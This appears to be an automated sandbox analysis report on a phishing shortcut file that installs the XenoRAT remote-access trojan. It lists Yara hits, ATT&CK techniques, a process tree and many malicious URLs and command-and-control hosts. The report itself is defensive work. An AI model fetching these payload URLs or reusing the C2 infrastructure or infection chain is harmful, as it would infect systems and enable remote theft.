                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected XenoRAT
                        Source: Yara matchFile source: 24.2.GFKMTE.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.GFKMTE.exe.29ba2dc.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.GFKMTE.exe.293a5ec.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.GFKMTE.exe.293a5ec.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.GFKMTE.exe.29ba2dc.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000018.00000002.1481629234.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.1512091151.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.1647276247.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.1512091151.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.1647276247.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.1512091151.0000000002BCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.1498518965.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.1498518965.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.1512091151.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.1498518965.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: GFKMTE.exe PID: 8044, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: GFKMTE.exe PID: 8112, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: GFKMTE.exe PID: 576, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: GFKMTE.exe PID: 6972, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected XenoRAT
                        Source: Yara matchFile source: 24.2.GFKMTE.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.GFKMTE.exe.29ba2dc.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.GFKMTE.exe.293a5ec.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.GFKMTE.exe.293a5ec.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.GFKMTE.exe.29ba2dc.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000018.00000002.1481629234.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.1512091151.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.1647276247.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.1512091151.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.1647276247.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.1512091151.0000000002BCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.1498518965.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.1498518965.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.1512091151.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.1498518965.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: GFKMTE.exe PID: 8044, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: GFKMTE.exe PID: 8112, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: GFKMTE.exe PID: 576, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: GFKMTE.exe PID: 6972, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information521
                        Scripting                        		Valid Accounts1
                        Exploitation for Client Execution                        		521
                        Scripting                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		OS Credential Dumping1
                        File and Directory Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Command and Scripting Interpreter                        		1
                        DLL Side-Loading                        		1
                        Extra Window Memory Injection                        		1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory23
                        System Information Discovery                        		Remote Desktop ProtocolData from Removable Media11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job                        		1
                        Scheduled Task/Job                        		211
                        Process Injection                        		3
                        Obfuscated Files or Information                        		Security Account Manager121
                        Security Software Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        PowerShell                        		Login Hook1
                        Scheduled Task/Job                        		12
                        Software Packing                        		NTDS11
                        Process Discovery                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets51
                        Virtualization/Sandbox Evasion                        		SSHKeylogging213
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Extra Window Memory Injection                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                        Masquerading                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job51
                        Virtualization/Sandbox Evasion                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                        Process Injection                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571198 Sample: TRANSFERENCIA COMPROBANTES.lnk Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 70 www.stipamana.com 2->70 72 templatesmetadata.office.net 2->72 74 4 other IPs or domains 2->74 84 Found malware configuration 2->84 86 Antivirus detection for URL or domain 2->86 88 Antivirus detection for dropped file 2->88 90 27 other signatures 2->90 10 WINWORD.EXE 141 451 2->10         started        15 powershell.exe 14 28 2->15         started        17 GFKMTE.exe 2->17         started        19 svchost.exe 2->19         started        signatures3 process4 dnsIp5 78 mira-tmc.tm-4.office.com 52.123.243.181, 443, 49728 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 10->78 64 C:\Users\user\AppData\Roaming\...behaviorgraphFKMTE.exe, PE32 10->64 dropped 66 C:\Users\user\...\cfdhxdzhtfxgh[1].exe, PE32 10->66 dropped 100 Office process queries suspicious COM object (likely to drop second stage) 10->100 21 GFKMTE.exe 10->21         started        80 www.stipamana.com 94.156.167.57, 443, 49699, 49701 SARNICA-ASBG Bulgaria 15->80 68 C:\Users\user\Desktop\pafdfgz.vbs, ASCII 15->68 dropped 102 Loading BitLocker PowerShell Module 15->102 24 wscript.exe 1 15->24         started        27 conhost.exe 1 15->27         started        29 GFKMTE.exe 17->29         started        31 GFKMTE.exe 17->31         started        33 GFKMTE.exe 17->33         started        82 127.0.0.1 unknown unknown 19->82 file6 signatures7 process8 file9 92 Uses schtasks.exe or at.exe to add and modify task schedules 21->92 94 Injects a PE file into a foreign processes 21->94 35 GFKMTE.exe 21->35         started        38 GFKMTE.exe 21->38         started        41 GFKMTE.exe 21->41         started        62 C:\Users\user\AppData\Local\Temp\    .doc, Composite 24->62 dropped 96 System process connects to network (likely due to code injection or exploit) 24->96 98 Windows Scripting host queries suspicious COM object (likely to drop second stage) 24->98 43 WerFault.exe 29->43         started        signatures10 process11 dnsIp12 58 C:\Users\user\AppData\Roaming\...behaviorgraphFKMTE.exe, PE32 35->58 dropped 45 GFKMTE.exe 35->45         started        76 dns.stipamana.com 87.120.121.160, 4567, 49886, 49924 UNACS-AS-BG8000BurgasBG Bulgaria 38->76 60 C:\Users\user\AppData\Local\...\tmp80A6.tmp, ASCII 38->60 dropped 48 schtasks.exe 38->48         started        file13 process14 signatures15 104 Injects a PE file into a foreign processes 45->104 50 GFKMTE.exe 45->50         started        52 GFKMTE.exe 45->52         started        54 GFKMTE.exe 45->54         started        56 conhost.exe 48->56         started        process16

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        TRANSFERENCIA COMPROBANTES.lnk39%ReversingLabsScript-PowerShell.Trojan.Boxter
                        TRANSFERENCIA COMPROBANTES.lnk44%VirustotalBrowse
                        TRANSFERENCIA COMPROBANTES.lnk100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe100%AviraTR/Dropper.MSIL.Gen
                        C:\Users\user\AppData\Local\Temp\ .doc100%AviraHEUR/Macro.Downloader.MRDO.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\ .doc100%Joe Sandbox ML

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://www.microsoft.70%Avira URL Cloudsafe
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdyt.CMD;.VBS;.O100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrssl100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfu#100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsVBE;.JS100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsj.dll100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkuEE100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdy3100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghd100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfPPj100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhg00j100%Avira URL Cloudmalware
                        https://www.stipamana.com/yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgr100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdrh100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdgh~~o100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryl~100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgz100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsd100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgW100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgf100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfg100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfy??o100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthB100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfg100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfyk100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xs100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgles100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgData=C:100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdf100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryh100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkuj.100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhi100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdiio100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfgh100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdt100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfTTo100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgt100%Avira URL Cloudmalware
                        https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/td100%Avira URL Cloudmalware
                        https://www.stipamana.0%Avira URL Cloudsafe
                        http://go.micros0%Avira URL Cloudsafe
                        https://www.stipamana.com/docd.dllu100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/x100%Avira URL Cloudmalware
                        https://www.stipamana.comHELL32.dll$0%Avira URL Cloudsafe
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsq100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhs100%Avira URL Cloudmalware
                        https://www.stipamana.com/dPT32.dll100%Avira URL Cloudmalware
                        https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs100%Avira URL Cloudmalware
                        https://www.stipamana.com/doapi.dll100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsd100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghppj100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythOFILE=C:100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsp100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsd:100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykg100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjuf100%Avira URL Cloudmalware
                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdE100%Avira URL Cloudmalware

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        mira-tmc.tm-4.office.com
                        		52.123.243.181
                        		truefalse
                          		high
                          bg.microsoft.map.fastly.net
                          		199.232.210.172
                          		truefalse
                            		high
                            dns.stipamana.com
                            		87.120.121.160
                            		truefalse
                              		high
                              www.stipamana.com
                              		94.156.167.57
                              		truefalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://www.stipamana.com/yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exetrue
                                • Avira URL Cloud: malware
                                		unknown
                                dns.stipamana.comfalse
                                  		high
                                  https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkujghdnjyrtder/buildds.docfalse
                                    		high
                                    https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbstrue
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrsslwscript.exe, 0000000A.00000002.1489654794.000002942EB67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.microsoft.7powershell.exe, 00000001.00000002.1441636494.000001BD458D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.stipamana.com/docdryhsfghdfghdfhgd/tsj.dllwscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfu#wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.microsoft.copowershell.exe, 00000001.00000002.1441636494.000001BD458D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.stipamana.com/docdryhsfghdfghdwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdyt.CMD;.VBS;.Owscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsVBE;.JSwscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdswscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkuEEwscript.exe, 0000000A.00000002.1489654794.000002942EB67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdy3wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://www.stipamana.com/docdryhsfghdwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://www.stipamana.com/docdryhsfghdfghdfPPjwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://www.stipamana.com/docdrhwscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://www.stipamana.com/docdryhsfghdfghdfhg00jwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdgh~~owscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1422765827.000001BD3D4C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrwscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://www.stipamana.com/docdryl~wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1391471213.000001BD2D451000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.stipamana.com/docdryhsfghdfghdfhwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1391471213.000001BD2E768000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfukwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.stipamana.com/docdryhsfghdfghdfhgdwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://go.micropowershell.exe, 00000001.00000002.1391471213.000001BD2E3B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1391471213.000001BD2E768000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.1422765827.000001BD3D4C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.ver)svchost.exe, 0000000D.00000002.2522223189.000002DD7EC00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
